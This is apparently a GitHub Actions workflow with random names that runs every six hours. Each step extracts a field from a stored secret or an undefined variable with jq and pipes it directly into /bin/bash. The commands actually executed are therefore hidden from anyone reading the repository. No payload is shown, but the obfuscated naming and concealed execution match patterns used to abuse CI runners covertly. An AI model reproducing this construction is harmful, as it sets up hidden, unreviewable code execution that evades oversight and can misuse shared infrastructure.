name: yanshisy
on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanshisy
        env:
          iaeo8: ${{ secrets.iaeo8 }}
        run: |
          echo $iaeo8 | jq -r .uj778 | /bin/bash
          echo $ehi6 | jq -r .i6 | /bin/bash
          echo $jh853 | jq -r .ftams67483 | /bin/bash
          echo $blm16 | jq -r .osfp7201 | /bin/bash
          echo $ecc8565 | jq -r .oj70353 | /bin/bash
          echo $au9 | jq -r .bqblb5787 | /bin/bash
          echo $v51 | jq -r .qdif27986 | /bin/bash
          echo $w530 | jq -r .f11 | /bin/bash
          echo $ddwe71352 | jq -r .nhkd4297 | /bin/bash
          echo $ddhaj50867 | jq -r .tuzp50 | /bin/bash
          echo $p95 | jq -r .tfq08920 | /bin/bash
          echo $oswa2 | jq -r .prfne3 | /bin/bash
          echo $f769 | jq -r .hc1365 | /bin/bash

